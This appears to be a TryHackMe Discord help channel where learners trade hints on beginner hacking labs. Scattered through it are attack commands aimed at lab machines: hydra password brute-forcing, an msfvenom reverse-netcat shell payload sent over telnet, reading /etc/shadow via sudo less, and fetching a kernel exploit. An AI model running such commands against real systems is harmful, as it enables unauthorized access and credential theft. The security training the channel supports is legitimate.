Hello community. Happy new year. I'm in the nmap room, task 14 (Practical). The question asked is: Does the target (MACHINE_IP)respond to ICMP (ping) requests (Y/N)? How can I determine the actual target machine IP address? Thanks in advance.

unborn moon
lunar onyx
#

Yes.

unborn moon
#

It should be in task 1, once the machine has fully booted, the Machine_IP variable should change values

lunar onyx
#

I hadn't used the green one. I had used the blue one on the top. Are they different?

unborn moon
#

Yes they are, in this case the attached machine is the target machine, and the Attackbox is the attacking machine you will be using to run a Nmap scan against the target machine

lunar onyx
#

I see... that explains my issue!

#

Ok now the question turned to: " Does the target (10.10.105.118)respond to ICMP (ping) requests (Y/N)?"
All logical!!

unborn moon
#

The Attackox is an Ubuntu VM, that is kind of like your personal hacking machine that comes equipped with all the tools, it will always be the same (except when it gets updated), whereas the attached machines will always be different depending on the room/task. Sometimes you will need to attack it, or sometimes it will be a specific OS with a specific tool that you will learn about. The details are generally explained within each task.

unborn moon
lunar onyx
#

right! Well thanks a bunch @unborn moon

green minnowBOT
#

Gave +1 Rep to @unborn moon

nimble wagon
#

Hello ...I am unable to connect to "Hacking Your First Machine". Whenever I try, it shows a message on the screen saying that "Failed to connect to server".

#

Any advise to overcome this issue pleas??

proud scarabBOT
white salmon
#

Hi everyone,

Could anyone help me with the following NMAP task 14 question?
Perform an Xmas scan on the first 999 ports of the target -- how many ports are shown to be open or filtered?

My results:
root@ip-10-10-11-112:~# nmap -sX --top-ports 999 10.10.11.112

Starting Nmap 7.60 ( https://nmap.org ) at 2023-01-11 15:01 GMT
Nmap scan report for ip-10-10-11-112.eu-west-1.compute.internal (10.10.11.112)
Host is up (0.000045s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
22/tcp open|filtered ssh
80/tcp open|filtered http
111/tcp open|filtered rpcbind
389/tcp open|filtered ldap
3389/tcp open|filtered ms-wbt-server
5901/tcp open|filtered vnc-1
6001/tcp open|filtered X11:1
7777/tcp open|filtered cbt
7778/tcp open|filtered interwise

Nmap done: 1 IP address (1 host up) scanned in 95.00 seconds
root@ip-10-10-11-112:~#

I'd say the answer is 9, but it's counted wrong.

peak tinsel
ivory meadow
lucid junco
lucid junco
ivory meadow
#

Oh shoot.

lucid junco
#

You'll also need to add -Pn as you already know the box isn't responding to pings.

white salmon
white salmon
green minnowBOT
#

Gave +1 Rep to @peak tinsel

peak tinsel
#
  • @ivory meadow
green minnowBOT
#

Gave +1 Rep to @ivory meadow

peak tinsel
#
  • @lucid junco
ivory meadow
#
  • @lucid junco
green minnowBOT
#

Gave +1 Rep to @lucid junco

lunar onyx
#

Hey guys!
I'm looking for solutions for the romms' labs. Not just answers but actual explanations. Does this exist.
Thanks

peak tinsel
lunar onyx
#

Thanks @peak tinsel , will look through this

green minnowBOT
#

Gave +1 Rep to @peak tinsel

prime plank
#

does pwnbox in Anattacktive Directory have Kerbrute built in?

#

sorry AttackBox?

primal valve
#

Hello team. I have been stuck here after answering everything under Pyramid of Pain specifically the Host Artifacts 2 last questions. I have researched but every answer I put is incorrect. I will appreciate if I get any guidance

vernal bronze
#

guys, i have one question. tryhackme, penetration tester course, website hacking, authentication bypass, username authentication. i cant enter sign up page

left thunder
vernal bronze
#

http://MACHINE_IP/customers/signup

#

i type my attackbox IP on machine ip but cant enter sign up page

left thunder
#

The attackbox is not the target machine, these are 2 separate machines

#

You have to start the target machine by pressing the green "Start machine" button that is attached to one of the tasks

vernal bronze
#

oo

#

thank you mannn

white salmon
#

In the Upload Vulnerabilities room it's mentioned that gobuster doesn't come on kali anymore by default. What is the reason it was removed? What was it replaced with?

wheat coral
#

I'm doing Operating System Security and am trying to su - root into Johnny's account with the password happyHack!ng but it's giving me Authentication failure

#

so i'm supposed to use command "su - root" which I do, it asks for password which is "happyHack!ng" and it's saying auth fail

#

I've tried it over a dozen time and have written it out manually in sublime then copy/pasted it

#

you're saying "happyHack!ng" is wrong? But that's what I typed into the answer box and it says thats the correct answer

#

ahhh

#

happyhack!ng doesnt work either, nor does HappyHack!ng

#

am I supposed to try every variation of cases? That's like 100's if not 1000's of varations

#

instructions were to check history and find the root password that was mis-typed then guess the correct version. In history it was happyHack!NG, so I put happyHack!ng into the answer box and it said this was the correct answer

#

if it wasnt case senstive, I could simply put the original "happyHack!NG" in and that would theoretically have also resulted in "correct-answer", that doesnt seem right..

#

I did read that my friend. Ah I misread it. I thought they meant he mistyped the password, not that he typed the correct password at an incorrect time

#

That's the one ๐Ÿ™‚

#

we're in! Thanks for your Lassi ๐Ÿ™‚

primal valve
#

Hello team. I am currently doing SOC Analyst course on the platform. I have been stuck here after answering everything under Pyramid of Pain specifically the Host Artifacts last questions. I have researched but every answer I put is incorrect(The question is: Use your OSINT skills and provide the name of the malicious document associated with the dropped binary) The name of the malicious document Emotet's G_jugk.exe. I will appreciate if I get any guidance. Thank you.

dark coral
primal valve
green minnowBOT
#

Gave +1 Rep to @dark coral

dark coral
#

As I am new to this discord group I am not aware of how much you are allowed to type here in general, so I will DM you.

primal valve
#

Same. I am new here too. We can further this discussion in the DM. Thanks

prime plank
#

does pwnbox in Attacktive Directory have Kerbrute built in?
sorry AttackBox?

azure osprey
#

@left thunder Thank you Fontaene again for the help much appreciated. Not the first time you help lead me to the information I needed to learn from my Mistakes. ๐Ÿ˜Ž

green minnowBOT
#

Gave +1 Rep to @left thunder

left thunder
azure osprey
#

I've had a issue I couldn't figure out with hydra for a while in Skynet. Your comment help me.

viscid wind
white salmon
#

hey for daily bugle, is the user flag for the joomla user or is it in the /home/users dir?

viscid wind
#

Never mind. I figured it out. ๐Ÿคฃ๐Ÿคฃ

white salmon
#

lol I did too actually

viscid wind
#

Good job because I was ready to throw my laptop away lol I was getting frustrated lol

white salmon
#

same, then the answer was actually super simple I was just overthinking

viscid wind
#

Lol same

#

Like whoops lol got frustrated for no reason๐Ÿ˜ตโ€๐Ÿ’ซ๐Ÿคฃ๐Ÿซฃ

white salmon
#

lol exactly

white salmon
#

Hello, I think I'm having trouble understanding task 10 of JavaScript basics room. It asks me to sort an array of numbers using a JavaScript Method. But I didn't understand which one. Should I try to ascending them? or reverse them? Thanks in advance

cold eagle
weak epoch
#

Afternoon. I'm in room Brooklyn Nine Nine, I got ssh creds for user jake and attempting to get root and notice the user can run /usr/bin/less with sudo. Am I on the right track?

alpine kestrel
#

ooh that looks like an easy win

vernal bronze
#

hi guys

#

i have a problem

#

on burpsuite: intruder

#

i go support login page. and send request

#

but i dont see my request on proxy

woeful crag
#

what options do you have enabled under Proxy -> Options? More than File extension?

#

and have you set up the proxy settings in your browser? Does it work on other sites?

vernal bronze
#

nothing

#

http method, request, url are not enable

#

i enable all of them but again i cant get anything on proxy intercept sub tab

woeful crag
#

having only the first option ticked is fine. You could also use the burp web browser from the proxy tab. But as I said you should check the proxy settings of your browser

vernal bronze
#

use system proxy settings is enable

#

enable dns on https is enable

#

is it true?

white salmon
weak epoch
#

Morning all. Okay so stil in the Brooklyn Nine Nine room. I have used the sudo less command to read etc/shadow and am now using john to try and crack the passwords. But oh boy is it taking awhile! Is there a faster option? Or! Is there a way to see what files are in a directory I dont have permission to access? If I could guess the name of the flag file shouldn't I still be able to read it with sudo less even without access to the directory?

left thunder
weak epoch
left thunder
#

Beside that there should be another option to escalate, did you check out gtfobins ?

weak epoch
#

sudo less /home/amy/root.txt

left thunder
weak epoch
left thunder
#

But I suggest you check gtfobins, there is a much easier way if you look closely

weak epoch
#

Okay I'll have another look

green minnowBOT
#

Gave +1 Rep to @left thunder

proud rivet
#

In the brute it room my hydra command isnโ€™t working even though itโ€™s identical to write ups

#

It just says the first entries in rock you are the answer, instead of actually looking for a password

#

Hydra -l admin -P rockyoupath IP http-post-form โ€œ/admin:user=admin&pass=^PASS^:Username or password invalidโ€

#

Yes and write ups even use slightly different syntax and still get the answer, of which Iโ€™ve tried multiple

lucid junco
#

hydra -l admin -P <PATH_TO_WORDLIST><MACHINE_IP> http-post-form โ€œ/admin/index.php:user=^USER^&pass=^PASS^:F=Username or password invalidโ€ -V

proud rivet
#

End my life

#

Ty

vernal bronze
#

guys plz help me

#

tryhackme, penetration tester. burp suite intruder. task 10.

#

i go login page and type random username and password. and turn on proxy and click login button.

#

but proxy cant capture request

lucid junco
vernal bronze
#

forward button is not active

#

fixed. i do it on proxy windows`s open browser part

lucid junco
#

That's one way, glad you got it fixed

pure thistle
#

? on the new room owaspapisecuritytop105w Task4 the GET request token "Authorisation-Token" is this a typo because it returns a 403 Forbidden {"success": "false", "cause": "authHeaderNotSet"}

pliant ridge
#

Hi Guys,

#

I'm stuck with this question : What is the flag that you obtained by following along?
Task 2# :3

lucid junco
unborn moon
misty stag
#

๐Ÿ˜†

pliant ridge
#

I couldn't find the answer

lucid junco
# pliant ridge yes

If you completed the site, it would have given you the flag.

Which room please?

pliant ridge
#

Task 3

lucid junco
pliant ridge
green minnowBOT
#

Gave +1 Rep to @lucid junco

lucid junco
astral estuary
pure thistle
weak epoch
#

Morning all. Doing the LazyAdmin CTF and I'm enumerating the website and I found a page that appears to be a login page for sweetrice? Is this a potential vector? I feel like I'm barking up the wrong tree..

alpine kestrel
green minnowBOT
#

Gave +1 Rep to @alpine kestrel

shell wigeon
#

Hello ! I got stuck at the Volatility Room of Cyber Defence PathwaY : Task 10 , practical investigations , question : What user-agent was employed by the adversary in Case 001? I am trying to type in the command provided in the hints but I am getting this error : vol.py -f <dump> -o /dir/to/store_dump/ windows.memmap.Memmap --pid 1640 --dump~
bash: dump: No such file or directory
Any guidance would be amazing . Thankss

pliant pivot
#

Hey I am in the room networkservices specially the ftp part.
Task 9 ask how many ports are open, the answer (bruteforce) is 2 but nmap shows me 1

why?

lucid junco
#

You are.

#

Maybe wait a few mins..

pliant pivot
#

weird, isn't it?

or maybe I should scan -v6 or udp ?

lucid junco
#

I got two ports.

pliant pivot
#

weird, I start it again

pliant pivot
lucid junco
lucid junco
#

All the services etc.

pliant pivot
#

Thanks ๐Ÿ™‚

aah doesn't matter. I am going forward for the next machine. Thank you @lucid junco

green minnowBOT
#

Gave +1 Rep to @lucid junco

ashen elm
#

Task 4 Filesystem Interaction Continued can some one help me withis lessonplease?

#

i want to know if the info and videos im following should have eveything i need to go through with it ?

#

because my machine doesnt come up with stuff its tellig to get up

#

for example i dont come up with a file note

#

i can create the files and folders and move and delte them but whn i go through this questiion, On the deployable machine, what is the file type of "unknown1" in "tryhackme's" home directory?

#

my machine doesnt come up with the same things as the videoo im wacthing

left thunder
unborn moon
left thunder
green minnowBOT
#

Gave +1 Rep to @unborn moon

ashen elm
#

im in complete beginner room

#

klai linux part 2

#

and also dont know how to verify

#

to show you

left thunder
dapper fern
vapid isle
#

Anyone around stuck on one question in (networkservice) trying to open a .txt file but it won't open.

ivory meadow
#

Can you try using quotes?

vapid isle
#

Figured out the more option but still can't seem to awnser the question ๐Ÿค”

vapid isle
#

i managed to open it but i can't seem to get it done!

woeful crag
azure osprey
vapid isle
#

i figured how to open it with more command but the file seems empty ๐Ÿค”

young gulch
#

try downloading the file

violet olive
#

need some help with the cross ste scripting room task 8 ive followed every step to a tee and its not working

iron dirge
#

Looking for a nudge for foothold on cmess

pine dust
#

Although you can take a look at walkthrough's

gaunt carbon
#

Man, talk about wacking your head against a wall. Anyone willing to lend a hand on Investigating Windows at all?

lucid junco
#

If*

gaunt carbon
#

LOL. Just having a hell of a time with the question "At what time did Windows first assign special privileges to a new logon?" Gone through the log back and forth, but nothing works. Nothing even matches the hint

wispy bloom
#

Room: File Inclusion
Task 8 | Challenge 1 | Capture Flag1 at /etc/flag1
So I know how to do it with BurpSuite but I'm really trying to learn ZAP. Can a ZAP guru tell me what I might be doing wrong here?

wispy bloom
#

๐Ÿคฆโ€โ™‚๏ธ

#

I should probably take a break

#

oof. Thanks

barren pewter
#

Can someone tell me what computer I am supposed to connect to in "Active Directory basics" Task 4? I sit here for like half an hour, not figuring this out. I am not getting it, sadly.

barren pewter
lucid junco
lucid junco
barren pewter
#

Hmm I could have sworn I've started it, let me check!

lucid junco
barren pewter
#

Yup, its offline. It must have shut down. Thanks!

nimble bridge
#

Hi everyone, working on the room Content Discovery, task 12.
Any of the 3 comments mentioned on the left, gives me an error, saying that the file doesnt exist.
What am I doing wrong?

lucid junco
#

The location of the word list might have changed.

woeful crag
#

it's SecLists, so just a typo in the path

unborn moon
#

Hey @nimble bridge , here's a tip that might come in handy. When typing a files path, you can use "tab" to auto complete. This can give you a good indication of if you've made a typo or not ๐Ÿ˜‰ ,and clicking on tab twice will show you a list of possible files/directories (in the path)

alpine kestrel
#

and in zsh pressing tab 3 times or more lets you cycle through the alternatives

distant sable
distant sable
green minnowBOT
#

Gave +1 Rep to @pine dust

void quail
#

Hi

#

did anyone completed willow ctf?

#

from where did i get the pass phrase

#

I got the password - wildflower

#

But couldn't find the passphrase anywhere

woeful crag
#

Passphrase - sounds like a job for ssh2john

sullen canyon
#

@lucid junco

ionic dirge
#

question, I'm on Red Team Engagements room an objective says "Use of white cards is permitted depending on downtime and length." What is a white card?

ivory meadow
exotic scroll
#

Hi all, Im doing operating System security, Task 3. I followed along beautifully logged in as Sammie, until the instructions said "we dicovered two more users" ? Jonny and Linda. There is no instruction as far as i can see to find these users? any pointers would be useful. Many thanks in advance. (Im completley new to this.)

exotic scroll
#

Thankyou, I found them

vapid isle
#

I still can't seem to get this ๐Ÿค”

#

?

#

when i try to open a file using "more" option it just gives me a blank file! ๐Ÿ™‚

#

but that's how the file is saved if i try doing underscores and all it just says file not found. ๐Ÿค”

#

still empty, but it does have weight "358" so there must be something in the file ๐Ÿค”

#

double quotes ๐Ÿ˜„

safe bobcat
# exotic scroll Thankyou, I found them

Hi...I'm new here and in the exact position as you๐Ÿค” Can you give me any clues how to complete the last task? Sure would appreciate the help and making some new connections to assist in learning this.๐Ÿ˜Ž

#

Anyone willing to offer some assistance on Operating System Security Task 3 can seem to get pass the last question.๐Ÿ˜ซ

safe bobcat
# pine dust what exactly is happening ?

question:
While logged in as Johnny, use the command su - root to switch to the root account. Display the contents of the file flag.txt in the root directory. What is the content of the file?

safe bobcat
#

When I try to follow these instructions I can't get pass su-root. It just keeps looping me back around to johnny@beginner - os - security

pine dust
#

ok

#

what exactly is your command ?

safe bobcat
#

su - root

ivory meadow
#

type whoami, does it say you are root?

safe bobcat
#

yes

ivory meadow
#

then you are currently in root user

safe bobcat
#

When I attempt to use the command flag.txt or cat nothing happens. Can't get to the root directory to see the content fo the file

pine dust
ivory meadow
safe bobcat
#

yes...but it says no such file on directory

ivory meadow
#

what?

safe bobcat
#

or command not found

ivory meadow
#

can you show screenshots?

#

!docs verify

proud scarabBOT
ivory meadow
#

(to send images to this channel)

safe bobcat
ivory meadow
safe bobcat
#

its not allowing me to get pass the prompt to follow channels on discord

#

I'm about to pull out all my hair

ivory meadow
#

DM @proud scarab with !verify

#

Right click to the bot and click Message

safe bobcat
#

THANK YOU!!! FINALLY FIGURED IT OUT!! STILL TRYING TO GET TO "BOT"๐Ÿคจ

ivory meadow
#

You need to first Right click to the bot, click message and type in : !verify <token> and it would look like: !verify abcdefghjilkaksfjnvnanc

frigid mason
#

Hi guys, any hints for the overpass 3 room. Iโ€™ve logged onto ftp with creds from the excel file.

#

And Iโ€™m still yet to find the first flag

royal urchin
#

in Local File Inclusion #1 room. Been going through everything for hours now and still none of these answers make sense with the material provided. No where to go from here and the hints give nothing useful. Any suggestions or actually helpful hints here. Thank you.

#

this is what I get when attempting to read /etc/passwd. When the question asks for the request url but is formatted in a way that makes no sense. I understand the concept. the wording of the question is awful and does not allow me to complete it.

alpine kestrel
frigid mason
#

Cheers

dawn wind
#

can i send my youtube link video here? i'll start to upload my tasks here in tryhackme

left thunder
left thunder
# royal urchin

What is unclear? If you check the hint, you see the format in which they want you to provide that answer.
So now translate that format to lab 1

vital estuary
weak epoch
#

Evening all. So I'm working on the CTF challenge "Startup" I notice that the files you have access to through the ftp server can also be seen on the web server, and the jpg works on the webserver but when I download it through ftp its not functional. Should this have my spidey-senses tingling or not really?

cold eagle
carmine eagle
#

hi, I'm struggling with Processes 101, Linux Fundamentals Part 3: Locate the process that is running on the deployed instance (10.10.125.72). What flag is given?
Need your support guys

vital estuary
#

!docs verify

proud scarabBOT
vital estuary
#

@carmine eagle that way you can show a screenshot of the output when you ran ps aux

carmine eagle
#

Problem solved. I restarted a machine and find the flag.

#

Thank you for help

vital estuary
#

No problem

weak epoch
green minnowBOT
#

Gave +1 Rep to @cold eagle

pure thistle
#

is it still too early to ask questions on the MalBuster room?

#

yes the new room that is out

#

yes that is what I'm asking ๐Ÿ˜•

#

thanks

green minnowBOT
#

Gave +1 Rep to @burnt rivet

white salmon
#

hey for the Pickle Rick box, am I missing something? I ran dirb, a full nmap, the thing in Robots isnt a path on the server

#

what am I not thinking of?

white salmon
#

nvm

covert cipher
lucid junco
covert cipher
lucid junco
covert cipher
weak epoch
#

Evening all. I'm doing CTF challenge "Startup" and I'm trying to get the root flag. The hint is pointing toward me using the script planner.sh in the users folder and the script references this file startup_list.txt. The user lennie doesn't seem to be able to sudo and cant write to the script or the .txt file so I'm not sure how to proceed...

young gulch
stuck rampart
#

Hi everyone. I am doing the Threat Intelligence Tools room currently, and Iโ€™ve run into an issue with the question โ€œWhat is TryHackMeโ€™s Cisco Umbrella rank?โ€ I think the rank has changed since the room was last updated. Does anyone have any advice?

pine dust
fathom river
#

Yo

exotic scroll
#

Hi, Im doing Linux fundementals part one, Q4, I run the command " whoami " and get Root, which is correct cos im logged in as Root, However the answer needed is TryHackMe, I started the Virtual Machine, but it does not log me in as the user TryHackMe?? Have I started the machine / Terminal wrong.? Thanks in Advance

#

Not sure how I managed to load wrong machine. New to to all this, but back on track now, Thankyou ๐Ÿ™‚

turbid gazelle
stuck rampart
green minnowBOT
#

Gave +1 Rep to @pine dust

pearl compass
#

Alguรฉm que fala portuguรชs?
Tenho uma dรบvida pra tirar sobre as liรงรตes iniciais.

pine dust
#

Qual รฉ a sua pergunta?

pearl compass
#

Tem uma questรฃo que devo responder nesse link

#

Ao meu ver, eu estou respondendo corretamente

#

Nรฃo sei se estou traduzindo errado a pergunta

pine dust
pearl compass
#

A primeira pergunta diz:

What do you need to access a web application?

#

What do you need to access a web application?

pearl compass
#

dm?

#

O que รฉ isso?

pine dust
pearl compass
#

Ah ksksksks

#

Pode

wind willow
#

anyone e done 'compromisedcomms' CTF ?

cloud crater
#

HELLO

umbral umbra
#

@pine dust @pearl compass This server is english only, please.

pine dust
umbral umbra
pine dust
tacit bison
#

Hello
I'm working on the Nmap room and can't really understand my mistake in this question:

#

How would you perform a ping sweep on the 172.16.x.x network (Netmask: 255.255.0.0) using Nmap? (CIDR notation)

#

I thought the answer would be: nmap -sn 172.16.x.x/16

#

But somehow, this doesn't work

#

(that's task 9)

pine dust
tacit bison
pine dust
pearl compass
#

I will use the translator next time

tepid carbon
maiden heron
#

I am doing the room https://tryhackme.com/room/investigatingwindows right now.

I believe I have the answer for the question "When did Jenny last login", but I am a little confused about the format of the answer. If someone could kindly point me towards it, I would appreciate it HappyOwl.

#

I figured it out.

white salmon
#

I am doing Linux Privilege Escalation room, Task 5 Privilege Escalation: Kernel Exploits. I cannot use wget to download exploit from my machine. It says ```HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/x-csrc]
ofs.c: Permission denied

Cannot write to โ€˜ofs.cโ€™ (Permission denied).``` How to get around this?

lucid junco
white salmon
green minnowBOT
#

Gave +1 Rep to @lucid junco

sage oyster
#

Morning all, I am confused/stuck again on the network services room (tryhackme.com/rooms/networkservices) I am on the Exploiting Telnet section, and I cannot seem to get a reverse shell to reveal the flag. I have a terminal session connected via Telnet, and can use the .RUN commands. I have another terminal running the netcat listener (although it is giving me a 0.0.0.0 IP address). I think I have created the payload with this command --> msfvenom -p cmd/unix/reverse_netcat lhost=<AttackBoxIP> lport=4444 R, and then copy/pasted into telnet after .RUN. However, not a lot seems to happen, I don't seem to have a reverse shell nor has the flag revealed itself. Could somebody let me know where I am going wrong or point me in the right direction please? Many TIA

left thunder
#

!docs verify

proud scarabBOT
sage oyster
left thunder
sage oyster
sage oyster
# left thunder !docs verify

Very strange, but it has all worked for me now. Maybe I should have reset the box yesterday or something, but I now have the flag ๐Ÿ™‚
And, at least I am all verified here now too : Sorry if I've wasted anyones time

sage oyster
#

I'm on the final task of the Network Services room, exploiting FTP. I've got hydra running, and extended the machine timer but it's still running and I had a pop up saying the machine terminated? I no longer have machine info at the top of the room page, but hydra is still running and I'm still getting a ping response..... I fully understand that these things can take some considerable time to complete IRL, but should it take over 2 hours in the training room? If not, then what have I done wrong?

woeful crag
#

Maybe your using a huge wordlist, can u share your command?

sage oyster
#

it sure is, used the command from the room -->"hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp" replacing User and IP for the correct ones

glossy trail
#

rnning it with python2

glossy trail
#

thanks brother and @unborn moon it worked ๐Ÿค

green minnowBOT
#

Gave +1 Rep to @burnt rivet

sage oyster
unborn moon
#

Ah, the Python 3 script ๐Ÿ™‚

vapid isle
#

Hey guys, just trying to find a solution here and stuck ๐Ÿค”

sage oyster
vapid isle
sage oyster
vapid isle
#

okay will do that ๐Ÿ™‚

sage oyster
vapid isle
vapid isle
#

what am I doing wrong am confused!

vapid isle
#

Yes

#

on the telnetted machine i want to call back to my netcat listener on my local machine.

#

Honestly trying all sorts of way ๐Ÿค” swapping ip's diferent terminals ๐Ÿค”

#

just no reaction

#

okay, once i restarted everything it worked ๐Ÿ˜„

sage oyster
#

Seems like we are getting stuck on the same things at the same time.......
I could do with some assistance on the final task of exploiting NFS. When I try to run the bash command, I'm getting these errors returned :